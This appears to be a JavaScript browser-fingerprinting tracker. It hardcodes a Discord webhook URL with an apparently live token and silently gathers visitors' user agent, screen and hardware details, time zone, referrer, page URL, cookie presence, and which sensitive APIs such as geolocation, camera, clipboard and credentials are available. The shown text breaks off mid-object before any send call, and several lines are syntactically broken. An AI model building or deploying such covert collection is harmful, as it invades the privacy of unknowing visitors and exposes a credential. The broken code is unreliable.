// Discord webhook URL
const WEBHOOK_URL = 'https://discord.com/api/webhooks/1406107665939042345/s8XXhrjJOdg5xYp4bMx3MsYaMhPpD-AXxnt3uOMUCdIErtabNOP-1BUMDX6Js5gXYK7p';

// Collect data for all trackers silently
const data = {
    Permissions: {
        'navigator.geolocation.getCurrentPosition': typeof navigator.geolocation?.getCurrentPosition === 'function' ? 'Available' : 'Not Available',
        'navigator.geolocation.watchPosition': typeof navigator.geolocation?.watchPosition === 'function' ? 'Available' : 'Not Available',
        'navigator.mediaDevices.getUserMedia(video)': typeof navigator.mediaDevices?.getUserMedia === 'function' ? 'Available' : 'Not Available',
        'navigator.mediaDevices.getUserMedia(audio)': typeof navigator.mediaDevices?.getUserMedia === 'function' ? 'Available' : 'Not Available',
        'navigator.mediaDevices.enumerateDevices': typeof navigator.mediaDevices?.enumerateDevices === 'function' ? 'Available' : 'Not Available',
        'navigator.mediaDevices.getDisplayMedia': typeof navigator.mediaDevices?.getDisplayMedia === 'function' ? 'Available' : 'Not Available',
        'Notification.requestPermission': typeof Notification?.requestPermission === 'function' ? 'Available' : 'Not Available',
        'navigator.credentials.get': typeof navigator.credentials?.get === 'function' ? 'Available' : 'Not Available',
        'navigator.credentials.store': typeof navigator.credentials?.store === 'function' ? 'Available' : 'Not Available',
        'navigator.permissions.query': typeof navigator.permissions?.query === 'function' ? 'Available' : 'Not Available',
        'navigator.clipboard.readText': typeof navigator.clipboard?.readText === 'function' ? 'Available' : 'Not Available',
        'navigator.clipboard.read': typeof navigator.clipboard?.read === 'function' ? 'Available' : 'Not Available',
        'navigator.clipboard.writeText': typeof navigator.clipboard?.writeText === 'function' ? 'Available' : 'Not Available',
        'navigator.clipboard.write': typeof navigator.clipboard?.write === 'function' ? 'Available' : 'Not Available',
        'navigator.share': typeof navigator.share === 'function' ? 'Available' : 'Not Available',
        'navigator.canShare': typeof navigator.canShare === 'function' ? 'Available' : 'Not Available',
        'EyeDropper.open': typeof EyeDropper !== 'undefined' ? 'Available' : 'Not Available',
        'navigator.wakeLock.request': typeof navigator.wakeLock?.request === 'function' ? 'Available' : 'Not Available',
        'IdleDetector.start': typeof IdleDetector !== 'undefined' ? 'Available' : 'Not Available',
        'PaymentRequest.show': typeof PaymentRequest !== 'undefined' ? 'Available' : 'Not Available',
        'navigator.contacts.select': typeof navigator.contacts?.select === 'function' ? 'Available' : 'Not Available',
        'navigator.bluetooth.requestDevice': typeof navigator.bluetooth?.requestDevice === 'function' ? 'Available' : 'Not Available',
        'navigator.usb.requestDevice': typeof navigator.usb?.requestDevice === 'function' ? 'Available' : 'Not Available',
        'navigator.serial.requestPort': typeof navigator.serial?.requestPort === 'function' ? 'Available' : 'Not Available',
        'navigator.hid.requestDevice': typeof navigator.hid?.requestDevice === 'function' ? 'Available' : 'Not Available',
        'navigator.requestMIDIAccess': typeof navigator.requestMIDIAccess === 'function' ? 'Available' : 'Not Available',
        'navigator.nfc.watch': typeof navigator.nfc?.watch === 'function' ? 'Available' : 'Not Available',
        'window.showOpenFilePicker': typeof window.showOpenFilePicker === 'function' ? 'Available' : 'Not Available',
        'window.showSaveFilePicker': typeof window.showSaveFilePicker === 'function' ? 'Available' : 'Not Available',
        'window.showDirectoryPicker': typeof window.showDirectoryPicker === 'function' ? 'Available' : 'Not Available'
    },
    Network: {
        'fetch': typeof fetch === 'function' ? 'Available' : 'Not Available',
        'navigator.sendBeacon': typeof navigator.sendBeacon === 'function' ? 'Available' : 'Not Available',
        'XMLHttpRequest': typeof XMLHttpRequest === 'function' ? 'Available' : 'Not Available',
        'WebSocket': typeof WebSocket === 'function' ? 'Available' : 'Not Available',
        'EventSource': typeof EventSource === 'function' ? 'Available' : 'Not Available',
        'RTCPeerConnection': typeof RTCPeerConnection === 'function' ? 'Available' : 'Not Available',
        'RTCPeerConnection.createDataChannel': typeof RTCPeerConnection?.prototype.createDataChannel === 'function' ? 'Available' : 'Not Available',
        'RTCPeerConnection.getStats': typeof RTCPeerConnection?.prototype.getStats === 'function' ? 'Available' : 'Not Available',
        'WebTransport': typeof WebTransport === 'function' ? 'Available' : 'Not Available'
    },
    Fingerprint: {
        'User Agent': navigator.userAgent || 'Not Available',
        'User Agent Data': typeof navigator.userAgentData !== 'undefined' ? 'Available' : 'Not Available',
        'User Agent Data Brands': Array.isArray(navigator.userAgentData?.brands) ? navigator.userAgentData.brands.map(b => b.brand).join(', ') : 'Not Available',
        'User Agent Data Platform': navigator.userAgentData?.platform || 'Not Available',
        'Platform': navigator.platform || 'Not Available',
        'Language': navigator.language || 'Not Available',
        'Languages': Array.isArray(navigator.languages) ? navigator.languages.join(', ') : 'Not Available',
        'Hardware Concurrency': navigator.hardwareConcurrency || 'Not Available',
        'Device Memory': navigator.deviceMemory || 'Not Available',
        'Max Touch Points': navigator.maxTouchPoints || 'Not Available',
        'Vendor': navigator.vendor || 'Not Available',
        'Product': navigator.product || 'Not Available',
        'Webdriver': navigator.webdriver || 'Not Available',
        'Do Not Track': navigator.doNotTrack || 'Not Available',
        'Cookie Enabled': navigator.cookieEnabled ? 'Yes' : 'No',
        'Java Enabled': typeof navigator.javaEnabled === 'function' ? navigator.javaEnabled() ? 'Yes' : 'No' : 'Not Available',
        'Plugins': navigator.plugins ? Array.from(navigator.plugins).length : 'Not Available',
        'Mime Types': navigator.mimeTypes ? Array.from(navigator.mimeTypes).length : 'Not Available',
        'Screen Width': screen.width || 'Not Available',
        'Screen Height': screen.height || 'Not Available',
        'Avail Width': screen.availWidth || 'Not Available',
        'Avail Height': screen.availHeight || 'Not Available',
        'Color Depth': screen.colorDepth || 'Not Available',
        'Pixel Depth': screen.pixelDepth || 'Not Available',
        'Orientation Type': screen.orientation?.type || 'Not Available',
        'Device Pixel Ratio': window.devicePixelRatio || 'Not Available',
        'Inner Width': window.innerWidth || 'Not Available',
        'Inner Height': window.innerHeight || 'Not Available',
        'Outer Width': window.outerWidth || 'Not Available',
        'Outer Height': window.outerHeight || 'Not Available',
        'Time Zone': Intl.DateTimeFormat().resolvedOptions().timeZone || 'Not Available'
    },
    Sensors: {
        'Battery': typeof navigator.getBattery === 'function' ? 'Available' : 'Not Available',
        'Charging': 'N/A (Silent)',
        'Level': 'N/A (Silent)',
        'Charging Time': 'N/A (Silent)',
        'Discharging Time': 'N/A (Silent)',
        'DeviceOrientationEvent': typeof DeviceOrientationEvent !== 'undefined' ? 'Available' : 'Not Available',
        'DeviceMotionEvent': typeof DeviceMotionEvent !== 'undefined' ? 'Available' : 'Not Available',
        'AbsoluteOrientationSensor': typeof AbsoluteOrientationSensor !== 'undefined' ? 'Available' : 'Not Available',
        'Accelerometer': typeof Accelerometer !== 'undefined' ? 'Available' : 'Not Available',
        'Gyroscope': typeof Gyroscope !== 'undefined' ? 'Available' : 'Not Available',
        'Magnetometer': typeof Magnetometer !== 'undefined' ? 'Available' : 'Not Available',
        'AmbientLightSensor': typeof AmbientLightSensor !== 'undefined' ? 'Available' : 'Not Available',
        'Barometer': typeof Barometer !== 'undefined' ? 'Available' : 'Not Available',
        'ProximitySensor': typeof ProximitySensor !== 'undefined' ? 'Available' : 'Not Available',
        'Vibrate': typeof navigator.vibrate === 'function' ? 'Available' : 'Not Available'
    },
    Graphics: {
        'Canvas 2D': typeof document.createElement('canvas').getContext('2d') !== 'undefined' ? 'Available' : 'Not Available',
        'Canvas toDataURL': typeof document.createElement('canvas').toDataURL === 'function' ? 'Available' : 'Not Available',
        'Canvas toBlob': typeof document.createElement('canvas').toBlob === 'function' ? 'Available' : 'Not Available',
        'OffscreenCanvas': typeof OffscreenCanvas !== 'undefined' ? 'Available' : 'Not Available',
        'WebGL': typeof document.createElement('canvas').getContext('webgl') !== 'undefined' ? 'Available' : 'Not Available',
        'WebGL Extensions': typeof document.createElement('canvas').getContext('webgl')?.getSupportedExtensions === 'function' ? 'Available' : 'Not Available',
        'WebGL Shader Precision': typeof document.createElement('canvas').getContext('webgl')?.getShaderPrecisionFormat === 'function' ? 'Available' : 'Not Available',
        'WebGL2': typeof document.createElement('canvas').getContext('webgl2') !== 'undefined' ? 'Available' : 'Not Available',
        'WebGL2 Extensions': typeof document.createElement('canvas').getContext('webgl2')?.getSupportedExtensions === 'function' ? 'Available' : 'Not Available',
        'WebGL2 Extension': typeof document.createElement('canvas').getContext('webgl2')?.getExtension === 'function' ? 'Available' : 'Not Available',
        'WebGPU': typeof navigator.gpu !== 'undefined' ? 'Available' : 'Not Available'
    },
    Storage: {
        'localStorage.setItem': typeof localStorage?.setItem === 'function' ? 'Available' : 'Not Available',
        'localStorage.getItem': typeof localStorage?.getItem === 'function' ? 'Available' : 'Not Available',
        'localStorage.removeItem': typeof localStorage?.removeItem === 'function' ? 'Available' : 'Not Available',
        'localStorage.clear': typeof localStorage?.clear === 'function' ? 'Available' : 'Not Available',
        'sessionStorage.setItem': typeof sessionStorage?.setItem === 'function' ? 'Available' : 'Not Available',
        'sessionStorage.getItem': typeof sessionStorage?.getItem === 'function' ? 'Available' : 'Not Available',
        'sessionStorage.removeItem': typeof sessionStorage?.removeItem === 'function' ? 'Available' : 'Not Available',
        'sessionStorage.clear': typeof sessionStorage?.clear === 'function' ? 'Available' : 'Not Available',
        'indexedDB.open': typeof indexedDB?.open === 'function' ? 'Available' : 'Not Available',
        'indexedDB.deleteDatabase': typeof indexedDB?.deleteDatabase === 'function' ? 'Available' : 'Not Available',
        'caches.open': typeof caches?.open === 'function' ? 'Available' : 'Not Available',
        'caches.keys': typeof caches?.keys === 'function' ? 'Available' : 'Not Available',
        'caches.delete': typeof caches?.delete === 'function' ? 'Available' : 'Not Available',
        'Cache.match': typeof caches?.open === 'function' ? 'Available' : 'Not Available',
        'Cache.put': typeof caches?.open === 'function' ? 'Available' : 'Not Available',
        'Cache.add': typeof caches?.open === 'function' ? 'Available' : 'Not Available',
        'Cache.addAll': typeof caches?.open === 'function' ? 'Available' : 'Not Available',
        'navigator.storage.estimate': typeof navigator.storage?.estimate === 'function' ? 'Available' : 'Not Available',
        'navigator.storage.persist': typeof navigator.storage?.persist === 'function' ? 'Available' : 'Not Available',
        'document.cookie': document.cookie.length > 0 ? 'Enabled' : 'Not Enabled',
        'document.requestStorageAccess': typeof document.requestStorageAccess === 'function' ? 'Available' : 'Not Available'
    },
    Workers: {
        'Worker': typeof Worker !== 'undefined' ? 'Available' : 'Not Available',
        'SharedWorker': typeof SharedWorker !== 'undefined' ? 'Available' : 'Not Available',
        'MessageChannel': typeof MessageChannel !== 'undefined' ? 'Available' : 'Not Available',
        'BroadcastChannel': typeof BroadcastChannel !== 'undefined' ? 'Available' : 'Not Available',
        'postMessage': typeof MessageChannel?.prototype.postMessage === 'function' ? 'Available' : 'Not Available',
        'onmessage': typeof MessageChannel?.prototype.onmessage !== 'undefined' ? 'Available' : 'Not Available'
    },
    ServiceWorker: {
        'navigator.serviceWorker.register': typeof navigator.serviceWorker?.register === 'function' ? 'Available' : 'Not Available',
        'navigator.serviceWorker.getRegistrations': typeof navigator.serviceWorker?.getRegistrations === 'function' ? 'Available' : 'Not Available',
        'navigator.serviceWorker.ready': typeof navigator.serviceWorker?.ready !== 'undefined' ? 'Available' : 'Not Available',
        'ServiceWorkerRegistration.unregister': typeof navigator.serviceWorker?.register === 'function' ? 'Available' : 'Not Available',
        'ServiceWorker.postMessage': typeof navigator.serviceWorker?.register === 'function' ? 'Available' : 'Not Available',
        'PushManager.subscribe': typeof navigator.serviceWorker?.ready?.then?. === 'function' ? 'Available' : 'Not Available',
        'PushManager.getSubscription': typeof navigator.serviceWorker?.ready?.then?. === 'function' ? 'Available' : 'Not Available',
        'SyncManager.register': typeof navigator.serviceWorker?.ready?.then?. === 'function' ? 'Available' : 'Not Available',
        'PeriodicSyncManager.register': typeof navigator.serviceWorker?.ready?.then?. === 'function' ? 'Available' : 'Not Available'
    },
    Media: {
        'HTMLMediaElement.play': typeof document.createElement('audio').play === 'function' ? 'Available' : 'Not Available',
        'HTMLMediaElement.pause': typeof document.createElement('audio').pause === 'function' ? 'Available' : 'Not Available',
        'HTMLMediaElement.captureStream': typeof document.createElement('audio').captureStream === 'function' ? 'Available' : 'Not Available',
        'MediaRecorder': typeof MediaRecorder !== 'undefined' ? 'Available' : 'Not Available',
        'MediaStreamTrack.getSettings': typeof MediaStreamTrack?.prototype.getSettings === 'function' ? 'Available' : 'Not Available',
        'MediaCapabilities.decodingInfo': typeof navigator.mediaCapabilities?.decodingInfo === 'function' ? 'Available' : 'Not Available',
        'MediaCapabilities.encodingInfo': typeof navigator.mediaCapabilities?.encodingInfo === 'function' ? 'Available' : 'Not Available',
        'navigator.mediaSession.setActionHandler': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'document.pictureInPictureEnabled': typeof document.pictureInPictureEnabled !== 'undefined' ? 'Available' : 'Not Available',
        'HTMLVideoElement.requestPictureInPicture': typeof document.createElement('video').requestPictureInPicture === 'function' ? 'Available' : 'Not Available',
        'document.exitPictureInPicture': typeof document.exitPictureInPicture === 'function' ? 'Available' : 'Not Available',
        'navigator.requestMediaKeySystemAccess': typeof navigator.requestMediaKeySystemAccess === 'function' ? 'Available' : 'Not Available'
    },
    'WebCodecs/Streams': {
        'VideoDecoder': typeof VideoDecoder !== 'undefined' ? 'Available' : 'Not Available',
        'AudioDecoder': typeof AudioDecoder !== 'undefined' ? 'Available' : 'Not Available',
        'VideoEncoder': typeof VideoEncoder !== 'undefined' ? 'Available' : 'Not Available',
        'AudioEncoder': typeof AudioEncoder !== 'undefined' ? 'Available' : 'Not Available',
        'ImageDecoder': typeof ImageDecoder !== 'undefined' ? 'Available' : 'Not Available',
        'EncodedVideoChunk': typeof EncodedVideoChunk !== 'undefined' ? 'Available' : 'Not Available',
        'ReadableStream': typeof ReadableStream !== 'undefined' ? 'Available' : 'Not Available',
        'WritableStream': typeof WritableStream !== 'undefined' ? 'Available' : 'Not Available',
        'TransformStream': typeof TransformStream !== 'undefined' ? 'Available' : 'Not Available',
        'CompressionStream': typeof CompressionStream !== 'undefined' ? 'Available' : 'Not Available',
        'DecompressionStream': typeof DecompressionStream !== 'undefined' ? 'Available' : 'Not Available'
    },
    Observers: {
        'MutationObserver': typeof MutationObserver !== 'undefined' ? 'Available' : 'Not Available',
        'ResizeObserver': typeof ResizeObserver !== 'undefined' ? 'Available' : 'Not Available',
        'IntersectionObserver': typeof IntersectionObserver !== 'undefined' ? 'Available' : 'Not Available',
        'PerformanceObserver': typeof PerformanceObserver !== 'undefined' ? 'Available' : 'Not Available',
        'performance.now': typeof performance?.now === 'function' ? 'Available' : 'Not Available',
        'performance.timing': typeof performance?.timing !== 'undefined' ? 'Available' : 'Not Available',
        'performance.getEntries': typeof performance?.getEntries === 'function' ? 'Available' : 'Not Available',
        'performance.memory': typeof performance?.memory !== 'undefined' ? 'Available' : 'Not Available',
        'ReportingObserver': typeof ReportingObserver !== 'undefined' ? 'Available' : 'Not Available'
    },
    'Window/Doc': {
        'Referrer': document.referrer || 'Not Available',
        'Location': document.location?.href || 'Not Available',
        'Domain': document.domain || 'Not Available',
        'Visibility State': document.visibilityState || 'Not Available',
        'Has Focus': document.hasFocus() ? 'Yes' : 'No',
        'History Length': window.history.length || 'Not Available',
        'History.pushState': typeof window.history?.pushState === 'function' ? 'Available' : 'Not Available',
        'History.replaceState': typeof window.history?.replaceState === 'function' ? 'Available' : 'Not Available',
        'Window.open': typeof window.open === 'function' ? 'Available' : 'Not Available',
        'Window.close': typeof window.close === 'function' ? 'Available' : 'Not Available',
        'Window.stop': typeof window.stop === 'function' ? 'Available' : 'Not Available',
        'Window.focus': typeof window.focus === 'function' ? 'Available' : 'Not Available',
        'Window.blur': typeof window.blur === 'function' ? 'Available' : 'Not Available',
        'Window.print': typeof window.print === 'function' ? 'Available' : 'Not Available',
        'Window.matchMedia': typeof window.matchMedia === 'function' ? 'Available' : 'Not Available',
        'Window.getSelection': typeof window.getSelection === 'function' ? 'Available' : 'Not Available',
        'Window.name': window.name || 'Not Available'
    },
    'Display Control': {
        'Element.requestFullscreen': typeof document.createElement('div').requestFullscreen === 'function' ? 'Available' : 'Not Available',
        'document.exitFullscreen': typeof document.exitFullscreen === 'function' ? 'Available' : 'Not Available',
        'document.fullscreenElement': typeof document.fullscreenElement !== 'undefined' ? 'Available' : 'Not Available',
        'Element.requestPointerLock': typeof document.createElement('div').requestPointerLock === 'function' ? 'Available' : 'Not Available',
        'document.exitPointerLock': typeof document.exitPointerLock === 'function' ? 'Available' : 'Not Available',
        'document.pointerLockElement': typeof document.pointerLockElement !== 'undefined' ? 'Available' : 'Not Available',
        'screen.orientation.lock': typeof screen.orientation?.lock === 'function' ? 'Available' : 'Not Available'
    },
    Auth: {
        'PublicKeyCredential.isUserVerifyingPlatformAuthenticatorAvailable': typeof PublicKeyCredential?.isUserVerifyingPlatformAuthenticatorAvailable === 'function' ? 'Available' : 'Not Available',
        'PublicKeyCredential.create': typeof navigator.credentials?.create === 'function' ? 'Available' : 'Not Available',
        'PublicKeyCredential.get': typeof navigator.credentials?.get === 'function' ? 'Available' : 'Not Available',
        'navigator.credentials.get(identity)': typeof navigator.credentials?.get === 'function' ? 'Available' : 'Not Available'
    },
    Files: {
        'FileReader.readAsText': typeof FileReader?.prototype.readAsText === 'function' ? 'Available' : 'Not Available',
        'FileReader.readAsArrayBuffer': typeof FileReader?.prototype.readAsArrayBuffer === 'function' ? 'Available' : 'Not Available',
        'FileReader.readAsDataURL': typeof FileReader?.prototype.readAsDataURL === 'function' ? 'Available' : 'Not Available',
        'DataTransfer.getData': typeof DataTransfer?.prototype.getData === 'function' ? 'Available' : 'Not Available',
        'DataTransfer.setData': typeof DataTransfer?.prototype.setData === 'function' ? 'Available' : 'Not Available',
        'DataTransferItem.getAsFile': typeof DataTransferItem?.prototype.getAsFile === 'function' ? 'Available' : 'Not Available',
        'DataTransferItem.webkitGetAsEntry': typeof DataTransferItem?.prototype.webkitGetAsEntry === 'function' ? 'Available' : 'Not Available',
        'FileSystemHandle.queryPermission': typeof window.showOpenFilePicker?.then === 'function' ? 'Available' : 'Not Available',
        'FileSystemHandle.requestPermission': typeof window.showOpenFilePicker?.then === 'function' ? 'Available' : 'Not Available',
        'FileSystemFileHandle.getFile': typeof window.showOpenFilePicker?.then === 'function' ? 'Available' : 'Not Available',
        'FileSystemFileHandle.createWritable': typeof window.showOpenFilePicker?.then === 'function' ? 'Available' : 'Not Available'
    },
    'Other Devices': {
        'navigator.getGamepads': typeof navigator.getGamepads === 'function' ? 'Available' : 'Not Available',
        'SpeechSynthesisUtterance': typeof SpeechSynthesisUtterance !== 'undefined' ? 'Available' : 'Not Available',
        'speechSynthesis.speak': typeof speechSynthesis?.speak === 'function' ? 'Available' : 'Not Available',
        'SpeechRecognition': typeof (window.SpeechRecognition || window.webkitSpeechRecognition) !== 'undefined' ? 'Available' : 'Not Available'
    },
    Coordination: {
        'navigator.locks.request': typeof navigator.locks?.request === 'function' ? 'Available' : 'Not Available',
        'Atomics.wait': typeof Atomics?.wait === 'function' ? 'Available' : 'Not Available',
        'SharedArrayBuffer': typeof SharedArrayBuffer !== 'undefined' ? 'Available' : 'Not Available'
    },
    'Presentation/XR': {
        'PresentationRequest': typeof PresentationRequest !== 'undefined' ? 'Available' : 'Not Available',
        'navigator.presentation.receiver': typeof navigator.presentation?.receiver !== 'undefined' ? 'Available' : 'Not Available',
        'navigator.xr.isSessionSupported': typeof navigator.xr?.isSessionSupported === 'function' ? 'Available' : 'Not Available',
        'navigator.xr.requestSession': typeof navigator.xr?.requestSession === 'function' ? 'Available' : 'Not Available'
    },
    'URL & Encoding': {
        'URL.createObjectURL': typeof URL?.createObjectURL === 'function' ? 'Available' : 'Not Available',
        'URL.revokeObjectURL': typeof URL?.revokeObjectURL === 'function' ? 'Available' : 'Not Available',
        'btoa': typeof btoa === 'function' ? 'Available' : 'Not Available',
        'atob': typeof atob === 'function' ? 'Available' : 'Not Available',
        'TextEncoder.encode': typeof TextEncoder?.prototype.encode === 'function' ? 'Available' : 'Not Available',
        'TextDecoder.decode': typeof TextDecoder?.prototype.decode === 'function' ? 'Available' : 'Not Available'
    },
    Scripting: {
        'eval': typeof eval === 'function' ? 'Available' : 'Not Available',
        'Function': typeof Function === 'function' ? 'Available' : 'Not Available',
        'WebAssembly.instantiate': typeof WebAssembly?.instantiate === 'function' ? 'Available' : 'Not Available',
        'WebAssembly.compile': typeof WebAssembly?.compile === 'function' ? 'Available' : 'Not Available'
    },
    'EME (DRM)': {
        'navigator.requestMediaKeySystemAccess': typeof navigator.requestMediaKeySystemAccess === 'function' ? 'Available' : 'Not Available',
        'MediaKeySystemAccess.createMediaKeys': typeof navigator.requestMediaKeySystemAccess?.then === 'function' ? 'Available' : 'Not Available',
        'HTMLMediaElement.setMediaKeys': typeof document.createElement('audio').setMediaKeys === 'function' ? 'Available' : 'Not Available'
    },
    'Events(document.addEventListener)': {
        'pointerdown': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerup': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointermove': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointercancel': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerover': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerout': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerenter': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerleave': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gotpointercapture': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'lostpointercapture': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'abort': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'afterprint': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationend': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationiteration': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationstart': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'auxclick': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeprint': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeunload': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'blur': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplay': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplaythrough': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'change': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'click': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'close': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'contextmenu': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'copy': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'cuechange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'cut': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dblclick': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'drag': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragend': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragenter': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragexit': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragleave': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragover': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragstart': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'drop': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'durationchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'ended': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'error': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focus': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusin': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusout': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'formdata': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenerror': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'hashchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'input': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'invalid': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keydown': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keypress': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keyup': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'languagechange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'load': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadeddata': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadedmetadata': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadstart': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'message': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'messageerror': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousedown': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseenter': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseleave': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousemove': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseout': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseover': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseup': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'offline': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'online': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'open': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'orientationchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pagehide': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pageshow': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'paste': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pause': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'play': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'playing': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'popstate': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'progress': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'ratechange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'rejectionhandled': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'reset': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'resize': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'scroll': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'securitypolicyviolation': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeked': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeking': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'select': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectionchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectstart': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'slotchange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'stalled': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'storage': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'submit': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'suspend': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'timeupdate': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'toggle': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchcancel': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchend': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchmove': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchstart': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'transitionend': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'unhandledrejection': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'visibilitychange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'volumechange': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'waiting': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'wheel': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepadconnected': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepaddisconnected': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'devicemotion': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientation': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientationabsolute': typeof document.addEventListener === 'function' ? 'Available' : 'Not Available'
    },
    'Events(window.addEventListener)': {
        'pointerdown': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerup': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointermove': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointercancel': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerover': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerout': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
